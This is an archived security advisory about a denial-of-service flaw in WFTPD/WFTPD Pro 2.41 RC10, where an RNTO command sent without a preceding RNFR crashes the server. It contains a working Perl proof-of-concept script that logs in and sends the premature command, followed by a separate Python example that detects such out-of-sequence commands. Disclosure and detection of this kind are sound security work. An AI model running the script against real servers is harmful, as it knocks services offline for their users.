wftpd241.txt

11 Jul 2000 | Reported by Blue Panda | Type: packetstorm | Source: packetstormsecurity.com

WFTPD Pro 2.41 RC10 crashes from out of sequence RNTO command by authenticated users.

`================================================================  
BluePanda Vulnerability Announcement: WFTPD/WFTPD Pro 2.41 RC10  
11/07/2000 (dd/mm/yyyy)  
  
[email protected]  
http://bluepanda.box.sk/  
================================================================  
  
Problem: An out of sequence RNTO command will cause WFTPD to crash.  
Vulnerable: WFTPD/WFTPD Pro 2.41 RC10, and prior.  
Immune: WFTPD/WFTPD Pro 2.41 RC11.  
  
==========  
Details:  
==========  
  
Anyone with a valid user/pass combination for a WFTPD server can cause it to  
terminate abnormally by issuing an RNTO command without first using RNFR.  
  
===================  
Proof of concept:  
===================  
  
#!/usr/bin/perl  
#  
# WFTPD/WFTPD Pro 2.41 RC10 denial-of-service  
# Blue Panda - [email protected]  
# http://bluepanda.box.sk/  
#  
# ----------------------------------------------------------  
# Disclaimer: this file is intended as proof of concept, and  
# is not intended to be used for illegal purposes. I accept  
# no responsibility for damage incurred by the use of it.  
# ----------------------------------------------------------  
#  
# Issues an RNTO command without first using RNFR, causing WFTPD to crash.  
#  
  
use IO::Socket;  
  
$host = "ftp.host.com" ;  
$port = "21";  
$user = "anonymous";  
$pass = "p\@nda";  
$wait = 10;  
  
# Connect to server.  
print "Connecting to $host:$port...";  
$socket = IO::Socket::INET->new(Proto=>"tcp", PeerAddr=>$host, PeerPort=>$port) || die "failed.\n";  
print "done.\n";  
  
# Login and issue premature RNTO command.  
print $socket "USER $user\nPASS $pass\nRNTO x\n";  
  
# Wait a while, just to make sure the commands have arrived.  
print "Waiting...";  
$time = 0;  
while ($time < $wait) {  
    sleep(1);  
    print ".";  
    $time += 1;  
}  
  
# Finished.  
close($socket);  
print "\nConnection closed. Finished.\n"  
  
`
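
The sequencing rule this advisory turns on, as an added example (not part of the original advisory and not WFTPD's code): RFC 959 requires RNTO to follow RNFR, and a server should answer a stray RNTO with 503 instead of acting on it. The sketch applies that check per session and uses it to flag premature RNTO commands in a command log; the log format, session ids and function names are assumptions made for illustration.

```python
# Added example. Log format ("<session-id> <command> [argument]") is constructed.
import re

CMD = re.compile(r"^(?P<sid>\S+)\s+(?P<verb>[A-Za-z]{3,4})\b\s*(?P<arg>.*)$")

def rename_reply(state, verb, arg):
    """Sequencing check for one session. state['rnfr'] holds the pending
    source path or None. Returns the RFC 959 reply code for RNFR/RNTO
    (assuming the rename itself would succeed), or None for other commands."""
    verb = verb.upper()
    if verb == "RNFR":
        state["rnfr"] = arg or None
        return 350 if arg else 501      # 350: pending further information
    if verb == "RNTO":
        src, state["rnfr"] = state.get("rnfr"), None
        if src is None:
            return 503                  # bad sequence of commands, nothing dereferenced
        return 250 if arg else 501
    state["rnfr"] = None                # any other command cancels a pending rename
    return None

def out_of_sequence_rnto(lines):
    """Return (session_id, line_number) for every RNTO with no pending RNFR."""
    sessions, hits = {}, []
    for n, raw in enumerate(lines, 1):
        m = CMD.match(raw.strip())
        if not m:
            continue                    # not a command line in the assumed format
        st = sessions.setdefault(m["sid"], {"rnfr": None})
        if rename_reply(st, m["verb"], m["arg"].strip()) == 503:
            hits.append((m["sid"], n))
    return hits

# Constructed sample: s1 renames correctly, s2 sends RNTO straight after login.
SAMPLE_LOG = """\
s1 USER alice
s1 PASS ****
s1 RNFR old.txt
s1 RNTO new.txt
s2 USER anonymous
s2 PASS ****
s2 RNTO x
s1 RNTO again.txt
""".splitlines()

if __name__ == "__main__":
    for sid, n in out_of_sequence_rnto(SAMPLE_LOG):
        print(f"session {sid}: RNTO without preceding RNFR at log line {n}")
```
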
